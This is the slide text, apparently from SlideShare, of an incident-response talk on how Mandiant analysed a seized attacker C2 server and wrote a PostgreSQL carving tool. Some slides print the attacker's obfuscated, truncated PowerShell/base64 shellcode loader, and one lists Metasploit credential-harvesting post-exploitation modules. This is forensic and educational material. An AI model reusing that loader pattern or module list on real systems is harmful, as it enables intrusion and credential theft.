SlideShare a Scribd company logo

Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure

Download as PPTX, PDF
Shakacon
Shakacon

As an incident responder, have you ever thought about how much easier an investigation would be if you had the C2 server in your possession? In this talk, we are going to deep dive a rare investigation in which Mandiant obtained a forensic copy of an attacker C2 system. You will learn about the initial compromise of the C2 server, the tools and tactics used by the attacker, and the investigative steps taken to identify the full scope of the attack. In addition, you will learn about the specific challenges involved with the analysis, the tool I developed to carve all PostGreSQL rows from a forensic image, and some unique lessons learned from performing this investigation.

1 of 62
1© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Honey, I Stole Your C2 Server A Dive Into Attacker Infrastructure
2© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL About Me • Senior Consultant – Mandiant, a FireEye Company • Focus on incident response • Email: andrew.rector@mandiant.com • Twitter: @andy_rektor
3© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Agenda  Summary of an enterprise investigation  Analysis of a Command and Control (C2) server  PostGrok: A post-mortem Python project
4© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL SUMMARY OF THE ATTACK
5© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A Typical Mandiant Investigation  Client calls  Deploy technology  Find evil, solve crime  Eradicate the attacker  Post-remediation monitoring  Sayonara
6© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL This Investigation  Standard beginning to any investigation… - Fortune 500 financial client contacts Mandiant - September 2016 - Identified “strange” service installations…
7© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI - ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Co nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)
8© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI - ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Co nvert]::FromBase64String(“SSByZWFsbHkgaG9wZSB5b3W SdmUgbWlzc2VkIG1lIGEgbG90LiBUaG91Z2ggSSBzZWUgdGhl eSBkaWRuknQgbGV0IHlvdSBmb3JnZXQgbXkgbmFt…==”)
9© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Details • Intelligence-led scoping • Metasploit based indicators • Non-standard workstation names • Service installations containing: • %comspec% • PowerShell • Base64 encoding 4624 | Audit Success | An account was successfully logged on. <data> - Network Information: Workstation Name: QmMhuLYFzfNVblK2 Source Network Address: 10.10.10.10 Source Port: 3283 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 0
10© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Investigation Summary  72 long hours later… - 129 systems Identified - 116 compromised accounts - Initial attack vector identified
11© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL ANALYSIS OF A C2 SERVER
12© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Two-sided Perspective  The responder’s perspective - Incident response investigation  The attacker’s perspective - Command and Control (C2) server
13© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Back to That Service Installation 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Conv ert]::FromBase64String(“SSByZ…==”);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.Compre ssionMode]::Decompress))).ReadToEnd();…
14© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Identify base64 encoded data  Identify compression scheme
15© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code 7045 | Information | A service was installed in the system. Service Name: NlCDHxYwMDHIOjtS Service File Name: %COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Conv ert]::FromBase64String(“SSByZ…==”);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.Compre ssionMode]::Decompress))).ReadToEnd();…
16© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Decode base64 encoded layer 2 function function pwej6xjR { Param ($oID, $fP4L8tiY5H) $d9V = ([AppDomain]::CurrentDomain.GetAssemblies() | Where- Object { $_.GlobalAssemblyCache -And $_.Location.Split('')[- 1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods’) <snipped> [Byte[]]$uGTfyXcU4 = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItS YEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxI AdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI…==")
17© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Decoding Obfuscated Code  Disassemble shellcode  Identify network calls  Convert network byte order to ascii
18© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Provide Decoded IP to Client  Provide decoded IP to client C2 IP Address
19© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A Familiar IP  Client recognizes IP owner  Described as a “small time competitor”
20© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Client Asks For C2 Server
21© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Client Receives Entire Server
22© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Mandiant Images Server
23© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Windows Server 2008 - Attacker created their own user account - Privilege escalation and credential harvesting - Best of all… • Downloaded VMWare Workstation • Downloaded Kali Linux ISO • Installed Kali VM – July 2016 • Two months before attack starts
24© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Investigation inception - Focus on Kali - Export VM - Rinse, wash, repeat
25© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Forensic Analysis  Kali VM - Valuable secure logs - Meterpreter configuration file - SQLMap – Detecting and exploiting SQL flaws - BeEF – The Browser Exploitation Framework - Revealing keyword searches - PostgreSQL history contained some interesting data createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
26© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit and PostgreSQL  PostgreSQL command history tells a story  PostgreSQL is messy - /var/lib/postgresql/<version>/main/base - Collection of binary files - Publicly available parser doesn’t exist
27© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Boot Up  It’s a VM… what if we just boot up the VM and access the DB directly? - Password protected - Single User Mode - Change PW - Profit
28© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL I AM THE ATTACKER Got System Impersonate Attacker
29© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit… For IR?  Leverage PostgreSQL history to obtain critical DB info  Leverage MSFConsole to interact with PostgreSQL DB createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
30© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit DB Commands Command Function Creds List all credentials in the database Hosts List all hosts in the database Loot Information gained from post-exploitation modules Notes Information from reconnaissance and network enumeration Services Services running on identified hosts Vulns Vulnerabilities identified, and exploitation status
31© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Shenanigans  Good… but not great - Not everything had timestamps - Wanted even more detail  Directly accessing the DB and bypassing Metasploit is the better way to go - DB via psql – psql –U msf –h localhost - And…
32© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL SO MANY TABLES!
33© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit Credential Publics
34© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Metasploit Credential Realms
35© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Sessions
36© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Sessions Decoded ..{$".WORKSPACEI"..:.EF".VERBOSEI" true.;.F" USERNAME".Ultra<REDACTED>" PASSWORD".<REDACTED>".USER_FILEI"..;.F".PASS_FILEI"..;.F".USERPASS_FILEI"..;.F".B RUTEFORCE_SPEEDI".5.;.F".BLANK_PASSWORDSI" false.;.F".USER_AS_PASSI" false.;.F".DB_ALL_CREDSI" false.;.F".DB_ALL_USERSI" false.;.F".DB_ALL_PASSI" false.;.F".STOP_ON_SUCCESSI" false.;.F".REMOVE_USER_FILEI" false.;.F".REMOVE_PASS_FILEI" false.;.F".REMOVE_USERPASS_FILEI" false.;.F".MaxGuessesPerServiceI".0.;.F".MaxMinutesPerServiceI".0.;.F".MaxGuesses PerUserI".0.;.F".InitialAutoRunScript".".AutoRunScript".".RHOSTS".<company.domain .com>".THREADSI".50.;.F".ShowProgressI" true.;.F".ShowProgressPercentI".10.;.FI" RPORT.;.FI".22.;.FI".Proxies.;.FI"..;.F".SSH_DEBUGI" false.;.F".SSH_TIMEOUTI".30.;.F" RHOSTI".<Remote IP Address>.;.F
37© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Case Solved  A complete timeline  A perspective from two sides: - The investigator - The attacker!  Happy client, happy consultant
38© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL POSTGROK: A POST-MORTEM PYTHON PROJECT
39© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  BUT WAIT… - Attacker had access to C2 server since July 2016 - PostgreSQL history contained evidence of prior DBs - Is there any way to recover deleted DBs?
40© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  At least three deleted PostgreSQL databases - Data verified via keyword searches  Has anyone ever tried to recover PostgreSQL databases? - Research didn’t identify anything obvious - One project that was a work in progress, but not as much focus on PostgreSQL createuser msf -P -S -R -D createdb -O msf msf exit dropdb msf dropuser msf dropdb ms_test dropuser msf createuser msf -P -S -R -D createdb -O msf msf exit dropdb dropdb msf createdb msf exit
41© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Identifying Additional Victims  Python Hobbyist - PostgreSQL is Open Source - Went on a journey to read C - Created PostGrok to carve all PostgreSQL rows from a flat binary file (raw image)
42© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Down the PostgreSQL Rabbit Hole
43© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Terms and Definitions  Anatomy of a PostgreSQL DB - Tables - Page (page header) - Row pointers - Free space - Row entry
44© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL A PostgreSQL Page Color Meaning Red Table Header Blue Row Pointers Yellow Null Space Purple Row Data
45© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Page Header  Table header - 24 byte structure - Version info - # of rows = (pd_lower – 24)/24 Version PD_Lower
46© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row Pointers  Row pointers - Four byte structures - Contains offset and size of row
47© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Page Free Space  Free space - New row pointers added from start of free space - New row data added to the end
48© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row  Row entry - 24 byte header - Row data Row Header
49© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostgreSQL Row Header  Row header - Row insertion ID - Row deletion ID - Number of attributes - Offset of row data Deletion ID Insertion ID # of Attributes Row data offset
50© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Row Data  Row data - Integers - Dates and times - Variable length strings
51© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostGrok Capabilities  PostGrok - A Python tool that thoroughly understands PostgreSQL  Capabilities: - Carve PostgreSQL rows from a flat, binary file - Keyword searching - Exports to CSV or XLSX - Officially support version 9.5
52© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL https://github.com/arector327/PostGrok
53© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL PostGrok Findings  PostGrok helped identify: - Full Meterpreter sessions from campaigns occurring in: • July 2016 • August 2016 • September 2016 - 1,428 compromised credentials - 48 enumerated domains
54© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Top Post-Exploitation Modules Module Frequency Function run post/windows/gather/credentials/sso 81 Extract SSO credentials run post/windows/gather/enum_ad_computers 26 Enumerates systems in the default AD directory run post/windows/gather/enum_domains 24 Enumerates domains a host has visibility into run post/windows/gather/smart_hashdump 14 Dumps local accounts from SAM database run post/multi/gather/filezilla_client_cred 11 Collects credentials from FileZilla FTP client run post/windows/gather/credentials/gpp 8 Gathers GPP XML files and extracts pw’s run post/windows/gather/credentials/credential_collector 7 Extracts credentials from host run post/windows/gather/credentials/outlook 4 Extracts and decrypts Outlook passwords from the Windows Registry run post/windows/gather/credentials/tortoisesvn 4 Extracts and decrypts saved TortoiseSVN pw’s
55© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Creates User Accounts Attacker creates user account “mava2” on victim system
56© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Uploaded Webshells Attacker uploads “ntdaddy.php” and “cmd.php” to victim web server
57© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Data Theft Attacker downloads file “wifi_pass.xlsx” from victim workstation Attacker views contents of “FileZilla.txt” and downloads “23.7.2016.xls”
58© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Tradecraft Attacker executes PsExec, creates reverse shell using NetCat
59© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Attacker Tradecraft (cont.) Attacker attempts to unzip the archive “file.zip”, is unsuccessful and downloads DLL from another compromised web server
60© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Summary  Mandiant investigated an intrusion conducted by an unknown attacker  Obtained a C2 server, and performed forensic analysis  Developed a tool to carve PostgreSQL rows from an image
61© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Takeaways  Metasploit gets the job done  Operational security  Just ask
62© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL© Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL QUESTIONS?

Recommended

Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of Compromise
Tomasz Jakubowski
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of Compromise
FireEye, Inc.
 
What Happens Before the Kill Chain
What Happens Before the Kill Chain What Happens Before the Kill Chain
What Happens Before the Kill Chain
OpenDNS
 
David Bianco - Enterprise Security Monitoring
David Bianco - Enterprise Security MonitoringDavid Bianco - Enterprise Security Monitoring
David Bianco - Enterprise Security Monitoring
bsidesaugusta
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 

Recommended

Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of Compromise
Tomasz Jakubowski
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of Compromise
FireEye, Inc.
 
What Happens Before the Kill Chain
What Happens Before the Kill Chain What Happens Before the Kill Chain
What Happens Before the Kill Chain
OpenDNS
 
David Bianco - Enterprise Security Monitoring
David Bianco - Enterprise Security MonitoringDavid Bianco - Enterprise Security Monitoring
David Bianco - Enterprise Security Monitoring
bsidesaugusta
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
Katie Nickels
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chain
Symantec Brasil
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
MITRE ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?)
MITRE ATT&CK
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
Priyanka Aash
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
Hacks in Taiwan (HITCON)
 
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatchDetecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
Lancope, Inc.
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
MITRE ATT&CK
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
PROIDEA
 
Putting Cyber Attackers on the Defensive
Putting Cyber Attackers on the DefensivePutting Cyber Attackers on the Defensive
Putting Cyber Attackers on the Defensive
Fidelis Cybersecurity
 
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint Security
CrowdStrike
 
Extend Network Visibility and Secure Applications and Data in Azure
Extend Network Visibility and Secure Applications and Data in AzureExtend Network Visibility and Secure Applications and Data in Azure
Extend Network Visibility and Secure Applications and Data in Azure
Fidelis Cybersecurity
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
Lancope, Inc.
 
Extending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the EndpointExtending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the Endpoint
Lancope, Inc.
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdStrike
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
Ankita Ganguly
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
ISSA LA
 
ICS case studies v2
ICS case studies v2ICS case studies v2
ICS case studies v2
Nguyen Binh
 
Analyzing RDP traffc with Bro
Analyzing RDP traffc with BroAnalyzing RDP traffc with Bro
Analyzing RDP traffc with Bro
Josh Liburdi
 

More Related Content

What's hot

BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
Katie Nickels
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chain
Symantec Brasil
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
MITRE ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?)
MITRE ATT&CK
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
Priyanka Aash
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
Hacks in Taiwan (HITCON)
 
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatchDetecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
Lancope, Inc.
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
MITRE ATT&CK
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
PROIDEA
 
Putting Cyber Attackers on the Defensive
Putting Cyber Attackers on the DefensivePutting Cyber Attackers on the Defensive
Putting Cyber Attackers on the Defensive
Fidelis Cybersecurity
 
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
Adam Pennington
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint Security
CrowdStrike
 
Extend Network Visibility and Secure Applications and Data in Azure
Extend Network Visibility and Secure Applications and Data in AzureExtend Network Visibility and Secure Applications and Data in Azure
Extend Network Visibility and Secure Applications and Data in Azure
Fidelis Cybersecurity
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
Lancope, Inc.
 
Extending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the EndpointExtending Network Visibility: Down to the Endpoint
Extending Network Visibility: Down to the Endpoint
Lancope, Inc.
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdStrike
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
Ankita Ganguly
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
ISSA LA
 

What's hot (20)

BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Addressing the cyber kill chain
Addressing the cyber kill chainAddressing the cyber kill chain
Addressing the cyber kill chain
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?)
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatchDetecting Threats: A Look at the Verizon DBIR and StealthWatch
Detecting Threats: A Look at the Verizon DBIR and StealthWatch
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
 
Putting Cyber Attackers on the Defensive
Putting Cyber Attackers on the DefensivePutting Cyber Attackers on the Defensive
Putting Cyber Attackers on the Defensive
 
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint Security
 
Extend Network Visibility and Secure Applications and Data in Azure
Extend Network Visibility and Secure Applications and Data in AzureExtend Network Visibility and Secure Applications and Data in Azure
